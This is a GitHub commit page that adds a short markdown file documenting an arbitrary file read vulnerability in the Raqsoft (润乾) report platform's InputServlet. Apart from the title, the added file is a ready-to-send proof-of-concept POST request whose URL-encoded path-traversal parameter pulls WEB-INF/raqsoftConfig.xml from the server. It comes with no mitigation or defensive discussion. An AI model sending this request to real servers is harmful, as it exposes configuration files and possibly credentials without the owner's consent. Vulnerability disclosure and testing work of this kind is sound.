Skip to content

Commit

Permalink
Create 润乾报表平台InputServlet存在任意文件读取漏洞.md
Browse files Browse the repository at this point in the history
  • Loading branch information
wy876 authored Apr 27, 2024
1 parent c1f8fea commit 2eed132
Showing 1 changed file with 14 additions and 0 deletions.
14 changes: 14 additions & 0 deletions 润乾报表平台InputServlet存在任意文件读取漏洞.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,14 @@
## 润乾报表平台InputServlet存在任意文件读取漏洞


## poc
```
POST /InputServlet?action=13 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0
Content-Type: application/x-www-form-urlencoded
Connection: close
file=%2F%5C..%5C%5C..%5C%5CWEB-INF%5C%5CraqsoftConfig.xml&upFileName=web.config
```

0 comments on commit 2eed132

Please sign in to comment.